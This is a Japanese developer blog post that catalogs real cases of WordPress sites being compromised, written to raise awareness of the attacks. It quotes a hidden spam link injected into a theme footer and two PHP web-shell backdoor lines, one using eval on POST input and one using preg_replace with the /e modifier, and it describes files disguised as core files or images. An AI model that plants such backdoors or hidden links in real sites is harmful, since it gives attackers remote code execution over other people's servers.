Help us understand the problem. What is going on with this article?

WordPress 改竄コレクション

More than 1 year has passed since last update.

数百のWordPressを見てくると当然改竄被害もよく見る。
仕事で見てるのは5年くらい?それ以前含めても自分が設置したWPではないのに他の人が設置すると高確率で被害にあって本当に謎すぎる…。
どこかの会社が作ったWPでも同じなので法人だろうと技術力はない。

しばらくは初心者には難しいセキュリティ対策は控えてサーバー側で対策してたけどそれでは足りなくなって最近は遠慮なく本気でやってるので被害は出てない。

手元に残ってたファイルから改竄の実例を残す。

テーマ改竄

footer.phpに外部リンクが勝手に挿入されている。

<div style="position: absolute; top: -355px;left: -915px;"><a href="http://...">ルイヴィトンiphoneケース</a></div>

日本語だけどリンク先は台湾ドメインで犯人は謎…。
htmlだけで大したことないと思うなら違う。
不正にログイン成功されて管理画面からテーマ編集できてるのでこの時点でもう死んでる。
テーマ編集できるならPHPも使えるのでなんでもやられる。
改竄被害の原因のほとんどはブルートフォースアタックからの不正ログイン→管理画面からテーマやプラグインの編集。

昔から投稿でPHP使えるようにするプラグインは使うなと言われてる理由もこれ。何万回言っても使いたがる人は出てくるけど。

WP本体のファイルに偽装

不正ログインしてPHPが使えるようになったらどうするかというと
wp-admin/wp-includes/ 以下にファイルを作る。
素人が見てもまず気付かない。そもそも見ない。

wp-conf1g.phpreadme.php もあった。

気付かない所で攻撃してるので世の中のWPの大半は気付いてないだけですでに被害受けてると思っている。

PHPのようで画像のようでPHP

class-wp-user.php なんて名前でOSでプレビューすると画像だけど中身をよく見るとPHPコードが仕込まれてる。

<?php @eval($_POST[cmd]);?>

ログを残してる

log.htmltime.html があって前回のログを残してる。
ログを残すほど何度もやってきてる。

その他

具体的なコード書いても仕方ないしそんなに書ける例はなかった。
大体は外部から受け取ってるか

<?php if($_POST["reg"]<>""){@preg_replace("/[checksql]/e",$_POST['reg'],"saft");}?>

base64をdecodeして何か実行している。

Why not register and get more from Qiita?
  1. We will deliver articles that match you
    By following users and tags, you can catch up information on technical fields that you are interested in as a whole
  2. you can read useful information later efficiently
    By "stocking" the articles you like, you can search right away
Comments
Sign up for free and join this conversation.
If you already have a Qiita account
Why do not you register as a user and use Qiita more conveniently?
You need to log in to use this function. Qiita can be used more conveniently after logging in.
You seem to be reading articles frequently this month. Qiita can be used more conveniently after logging in.
  1. We will deliver articles that match you
    By following users and tags, you can catch up information on technical fields that you are interested in as a whole
  2. you can read useful information later efficiently
    By "stocking" the articles you like, you can search right away